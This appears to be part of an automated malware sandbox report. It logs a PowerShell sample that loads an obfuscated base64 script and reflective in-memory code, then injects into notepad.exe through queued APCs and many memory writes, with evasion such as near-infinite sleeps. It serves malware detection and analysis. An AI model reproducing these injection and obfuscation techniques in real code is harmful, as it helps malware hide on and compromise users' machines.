Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface (truncated in report): DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('My
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface (truncated in report): FromBase64String(@"IyBPYmZ1c2NhdGVkIHVzaW5nIGh0dHBzOi8vZ2l0aHViLmNvbS9EQVJLTk9TWS9SdXNoLVBvd2VyU2hlbGwtT2JmdXNjYXRvciwgbWFkZSBieSBEQVJLTjAkWQoKJGRlY29kZWRTY3JpcHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVV
Source: C:\Windows\System32\notepad.exe | Code function: 4_2_00000288574300DF | push ebp; iretd | 4_2_00000288574300E0
Source: C:\Windows\System32\notepad.exe | Code function: 4_2_0000028857430006 | push edi; ret | 4_2_0000028857430022

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical events)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical events)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX (104 identical events)
              Source: C:\Windows\System32\notepad.exe, Process information set: NOOPENFILEERRORBOX (31 identical events)
              Source: C:\Windows\System32\notepad.exe, Memory allocated: 28858ED0000 memory reserve | memory write watch
              Source: C:\Windows\System32\notepad.exe, Memory allocated: 28870F70000 memory reserve | memory write watch
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477 (2 identical events; 922337203685477 ms is the largest 64-bit interval, Int64.MaxValue 100-ns ticks, expressed in milliseconds, i.e. an effectively infinite wait)
              Source: C:\Windows\System32\notepad.exe, Thread delayed: delay time: 922337203685477 (2 identical events)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 5634
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 4101
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5524, Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\System32\notepad.exe TID: 4276, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
              Source: C:\Windows\System32\notepad.exe, File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information queried: ProcessInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process token adjusted: Debug
              Source: C:\Windows\System32\notepad.exe, Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created / APC Queued / Resumed: C:\Windows\System32\notepad.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Memory written: PID: 384 base: 2885743010F value: FF
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Memory written: PID: 384 base: 2885743018B value: FF
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Memory written: PID: 384 base: 2885743018D value: FF
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Thread APC queued: target process: C:\Windows\System32\notepad.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Memory written: C:\Windows\System32\notepad.exe base: 28857430000 through 28857430049 (74 writes at consecutive one-byte offsets)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430050Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430051Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430052Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430053Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430054Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430055Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430056Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430057Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430058Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430059Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430060Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430061Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430062Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430063Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430064Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430065Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430066Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430067Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430068Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430069Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430070Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430071Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430072Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430073Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430074Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430075Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430076Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430077Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430078Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430079Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430080Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430081Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430082Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430083Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430084Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430085Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430086Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430087Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430088Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430089Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430090Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430091Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430092Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430093Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430094Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430095Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430096Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430097Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430098Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430099Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300AAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300ABJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300ACJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300ADJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300AEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300AFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300EAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300EBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300ECJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300EDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300EEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300EFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DFJump to behavior
